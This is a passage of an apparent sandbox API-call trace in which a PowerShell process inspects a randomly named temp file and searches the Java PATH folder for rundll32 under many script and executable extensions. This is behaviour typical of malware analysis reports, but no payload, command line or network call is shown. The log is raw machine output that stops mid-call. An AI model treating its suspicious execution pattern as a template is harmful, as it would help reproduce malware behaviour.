lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508dac8 | out: phkResult=0xafa508dac8*=0x7f8) returned 0x0 [0200.135] RegQueryValueExW (in: hKey=0x7f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508db18, lpData=0x0, lpcbData=0xafa508db10*=0x0 | out: lpType=0xafa508db18*=0x1, lpData=0x0, lpcbData=0xafa508db10*=0x56) returned 0x0 [0200.135] RegQueryValueExW (in: hKey=0x7f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508db18, lpData=0x2380071a740, lpcbData=0xafa508db10*=0x56 | out: lpType=0xafa508db18*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xafa508db10*=0x56) returned 0x0 [0200.135] RegCloseKey (hKey=0x7f8) returned 0x0 [0200.135] EtwEventActivityIdControl () returned 0x0 [0200.136] SetEvent (hEvent=0x3bc) returned 1 [0200.136] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xafa508ded0*=0x3bc, lpdwindex=0xafa508dca4 | out: lpdwindex=0xafa508dca4) returned 0x0 [0200.137] CoTaskMemAlloc (cb=0x20e) returned 0x2386d708500 [0200.137] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x2386d708500, nSize=0x105 | out: lpBuffer="") returned 0x0 [0200.137] CoTaskMemFree (pv=0x2386d708500) [0200.137] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1b8 | out: lpConsoleScreenBufferInfo=0xafa508e1b8) returned 1 [0200.138] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1b8 | out: lpConsoleScreenBufferInfo=0xafa508e1b8) returned 1 [0200.203] EtwEventActivityIdControl () returned 0x0 [0200.203] EtwEventActivityIdControl () returned 0x0 [0200.203] EtwEventActivityIdControl () returned 0x0 [0200.267] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\anomoeomery.metalizedCredence" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\anomoeomery.metalizedcredence")) returned 0x20 [0200.270] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\anomoeomery.metalizedCredence" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\anomoeomery.metalizedcredence")) returned 0x20 [0200.270] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\", lpszLongPath=0xafa508dd40, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\") returned 0x16 [0200.270] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\anomoeomery.metalizedCredence", nBufferLength=0x105, lpBuffer=0xafa508dd60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\anomoeomery.metalizedCredence", lpFilePart=0x0) returned 0x46 [0200.321] EtwEventActivityIdControl () returned 0x0 [0201.006] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e690) returned 1 [0201.006] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\anomoeomery.metalizedCredence" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\anomoeomery.metalizedcredence"), fInfoLevelId=0x0, lpFileInformation=0x2380074a2d0 | out: lpFileInformation=0x2380074a2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4e197a1, ftCreationTime.dwHighDateTime=0x1d96d7b, ftLastAccessTime.dwLowDateTime=0xf4e197a1, ftLastAccessTime.dwHighDateTime=0x1d96d7b, ftLastWriteTime.dwLowDateTime=0xf889acb0, ftLastWriteTime.dwHighDateTime=0x1d96d7b, nFileSizeHigh=0x0, nFileSizeLow=0x94690)) returned 1 [0201.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e650) returned 1 [0201.416] CoTaskMemAlloc (cb=0x20e) returned 0x2386d705640 [0201.416] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x2386d705640, nSize=0x105 | out: lpBuffer="") returned 0x24 [0201.416] CoTaskMemFree (pv=0x2386d705640) [0201.416] CoTaskMemAlloc (cb=0x20e) returned 0x2386d703cc0 [0201.416] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x2386d703cc0, nSize=0x105 | out: lpBuffer="") returned 0x24 [0201.416] CoTaskMemFree (pv=0x2386d703cc0) [0201.416] CoTaskMemAlloc (cb=0x20e) returned 0x2386d703cc0 [0201.416] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x2386d703cc0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0201.417] CoTaskMemFree (pv=0x2386d703cc0) [0201.498] EtwEventActivityIdControl () returned 0x0 [0201.498] EtwEventActivityIdControl () returned 0x0 [0201.498] EtwEventActivityIdControl () returned 0x0 [0201.572] CoTaskMemAlloc (cb=0x20e) returned 0x2386d703cc0 [0201.572] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x2386d703cc0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0201.572] CoTaskMemFree (pv=0x2386d703cc0) [0201.572] CoTaskMemAlloc (cb=0x20e) returned 0x2386d7060e0 [0201.572] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2386d7060e0, nSize=0x105 | out: lpBuffer="") returned 0x3a [0201.572] CoTaskMemFree (pv=0x2386d7060e0) [0201.572] CoTaskMemAlloc (cb=0x20e) returned 0x2386d704320 [0201.572] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2386d704320, nSize=0x105 | out: lpBuffer="") returned 0x3a [0201.572] CoTaskMemFree (pv=0x2386d704320) [0201.572] CoTaskMemAlloc (cb=0x20e) returned 0x2386d708500 [0201.572] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2386d708500, nSize=0x105 | out: lpBuffer="") returned 0x9c [0201.573] CoTaskMemFree (pv=0x2386d708500) [0201.573] CoTaskMemAlloc (cb=0x20e) returned 0x2386d708500 [0201.573] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2386d708500 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0201.573] CoTaskMemFree (pv=0x2386d708500) [0201.573] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfe0) returned 1 [0201.573] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e0c0 | out: lpFileInformation=0xafa508e0c0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0201.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfa0) returned 1 [0201.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e030) returned 1 [0201.573] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.574] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\rundll32.ps1" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\rundll32.ps1"), lpFindFileData=0xafa508dd40 | out: lpFindFileData=0xafa508dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e030) returned 1 [0201.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfd0) returned 1 [0201.575] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfe0) returned 1 [0201.575] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e0c0 | out: lpFileInformation=0xafa508e0c0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0201.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfa0) returned 1 [0201.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e030) returned 1 [0201.575] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.575] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\rundll32.psm1" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\rundll32.psm1"), lpFindFileData=0xafa508dd40 | out: lpFindFileData=0xafa508dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e030) returned 1 [0201.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfd0) returned 1 [0201.575] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfe0) returned 1 [0201.576] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e0c0 | out: lpFileInformation=0xafa508e0c0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0201.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfa0) returned 1 [0201.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e030) returned 1 [0201.576] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.576] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\rundll32.psd1" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\rundll32.psd1"), lpFindFileData=0xafa508dd40 | out: lpFindFileData=0xafa508dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e030) returned 1 [0201.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfd0) returned 1 [0201.576] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfe0) returned 1 [0201.576] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e0c0 | out: lpFileInformation=0xafa508e0c0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0201.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfa0) returned 1 [0201.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e030) returned 1 [0201.577] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.577] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\rundll32.COM" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\rundll32.com"), lpFindFileData=0xafa508dd40 | out: lpFindFileData=0xafa508dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e030) returned 1 [0201.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfd0) returned 1 [0201.577] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfe0) returned 1 [0201.577] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e0c0 | out: lpFileInformation=0xafa508e0c0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0201.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfa0) returned 1 [0201.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e030) returned 1 [0201.577] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.578] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\rundll32.EXE" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\rundll32.exe"), lpFindFileData=0xafa508dd40 | out: lpFindFileData=0xafa508dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e030) returned 1 [0201.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfd0) returned 1 [0201.578] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfe0) returned 1 [0201.578] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e0c0 | out: lpFileInformation=0xafa508e0c0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0201.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfa0) returned 1 [0201.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e030) returned 1 [0201.578] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.578] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\rundll32.BAT" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\rundll32.bat"), lpFindFileData=0xafa508dd40 | out: lpFindFileData=0xafa508dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e030) returned 1 [0201.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfd0) returned 1 [0201.579] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfe0) returned 1 [0201.579] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e0c0 | out: lpFileInformation=0xafa508e0c0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0201.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfa0) returned 1 [0201.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e030) returned 1 [0201.579] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.579] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\rundll32.CMD" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\rundll32.cmd"), lpFindFileData=0xafa508dd40 | out: lpFindFileData=0xafa508dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e030) returned 1 [0201.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfd0) returned 1 [0201.580] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfe0) returned 1 [0201.580] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e0c0 | out: lpFileInformation=0xafa508e0c0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0201.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfa0) returned 1 [0201.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e030) returned 1 [0201.580] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.580] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\rundll32.VBS" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\rundll32.vbs"), lpFindFileData=0xafa508dd40 | out: lpFindFileData=0xafa508dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e030) returned 1 [0201.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfd0) returned 1 [0201.580] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.581] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfe0) returned 1 [0201.581] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e0c0 | out: lpFileInformation=0xafa508e0c0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0201.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfa0) returned 1 [0201.581] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e030) returned 1 [0201.581] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.581] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\rundll32.VBE" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\rundll32.vbe"), lpFindFileData=0xafa508dd40 | out: lpFindFileData=0xafa508dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e030) returned 1 [0201.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfd0) returned 1 [0201.581] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, 